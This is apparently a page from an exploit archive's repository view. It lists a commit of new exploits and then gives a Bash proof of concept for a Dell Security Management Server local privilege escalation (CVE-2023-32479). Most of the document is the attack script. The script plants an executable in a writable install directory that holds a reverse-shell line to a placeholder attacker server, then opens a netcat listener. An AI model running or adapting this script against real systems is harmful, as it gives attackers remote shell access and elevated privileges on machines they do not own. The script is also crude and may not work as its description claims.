e791587e41
10 changes to exploits/shellcodes/ghdb RouterOS 6.40.5 - 6.44 and 6.48.1 - 6.49.10 - Denial of Service Siklu MultiHaul TG series < 2.0.0 - unauthenticated credential disclosure Dell Security Management Server <1.9.0 - Local Privilege Escalation Asterisk AMI - Partial File Content & Path Disclosure (Authenticated) Broken Access Control - on NodeBB v3.6.7 liveSite Version 2019.1 - Remote Code Execution Purei CMS 1.0 - SQL Injection Workout Journal App 1.0 - Stored XSS WinRAR version 6.22 - Remote Code Execution via ZIP archive
26 lines
No EOL
1.1 KiB
Bash
Executable file
26 lines
No EOL
1.1 KiB
Bash
Executable file
# Exploit Title: [title] Dell Security Management Server versions prior to
|
|
11.9.0
|
|
# Exploit Author: [author] Amirhossein Bahramizadeh
|
|
# CVE : [if applicable] CVE-2023-32479
|
|
Dell Encryption, Dell Endpoint Security Suite Enterprise, and Dell Security
|
|
Management
|
|
Server versions prior to 11.9.0 contain privilege escalation vulnerability
|
|
due to improper ACL of the non-default installation directory. A local
|
|
malicious user could potentially exploit this vulnerability by replacing
|
|
binaries in installed directory and taking the reverse shell of the system
|
|
leading to Privilege Escalation.
|
|
|
|
#!/bin/bash
|
|
|
|
INSTALL_DIR="/opt/dell"
|
|
|
|
# Check if the installed directory has improper ACLs
|
|
if [ -w "$INSTALL_DIR" ]; then
|
|
# Replace a binary in the installed directory with a malicious binary that opens a reverse shell
|
|
echo "#!/bin/bash" > "$INSTALL_DIR/dell-exploit"
|
|
echo "bash -i >& /dev/tcp/your-malicious-server/1234 0>&1" >> "$INSTALL_DIR/dell-exploit"
|
|
chmod +x "$INSTALL_DIR/dell-exploit"
|
|
|
|
# Wait for the reverse shell to connect to your malicious server
|
|
nc -lvnp 1234
|
|
fi |